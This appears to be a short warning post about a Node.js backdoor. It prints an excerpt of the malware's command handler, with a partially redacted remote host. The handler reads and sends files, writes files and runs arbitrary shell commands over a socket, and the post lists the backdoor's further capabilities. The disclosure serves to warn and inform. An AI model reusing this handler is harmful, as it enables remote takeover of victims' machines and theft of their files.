For security reasons, I will not disclose the full decryption process.
Only a small sample will be shown.
const fs = require('fs');
const net = require('net');
const { exec } = require('child_process');
(The IP address is partially redacted for security reasons.)
// Remote endpoint the sample connects to; the author redacted the last two
// octets before publishing. Presumably handed to `net` for the reverse-shell
// connection listed below — the connect call itself is not in this excerpt.
const HOST = '188.166.XXX.XXX';
// Port for that same connection.
const PORT = 8080;
} else if (cmd.startsWith('cd ')) {
try {
process.chdir(cmd.substring(3));
socket.write('Directory changed\n');
} catch (err) {
socket.write('Error: ' + err.message + '\n');
}
} else if (cmd.startsWith('get ')) {
const file = cmd.substring(4);
if (fs.existsSync(file)) {
const content = fs.readFileSync(file, 'utf8');
socket.write('FILE_START:' + file + '\n' + content + '\nFILE_END');
} else {
socket.write('File not found: ' + file + '\n');
}
} else if (cmd.startsWith('put ')) {
const parts = cmd.split('\n');
const fileName = parts[0].substring(4);
const content = parts.slice(1).join('\n');
fs.writeFileSync(fileName, content);
socket.write('File written: ' + fileName + '\n');
} else {
exec(cmd, (error, stdout, stderr) => {
socket.write(stdout || stderr || 'Command executed\n');
});
This is not one of the usual backdoors we have seen so far.
It is extremely serious and must be reported to the Cyber Crime Unit.
This constitutes a cybercrime, and you need to pay close attention.
Below is a summary of what it is capable of doing. Only items 1–3 (plus the `cd` handler) are visible in the excerpt above; the remaining items are not shown in this excerpt.
1. Connecting to a malicious server (Reverse Shell)
2. Executing arbitrary commands on your computer
3. Downloading/Uploading files
4. Collecting system information
5. Attempting to take screenshots
6. Adding to startup for permanent execution
7. Automatically reconnecting if the connection is lost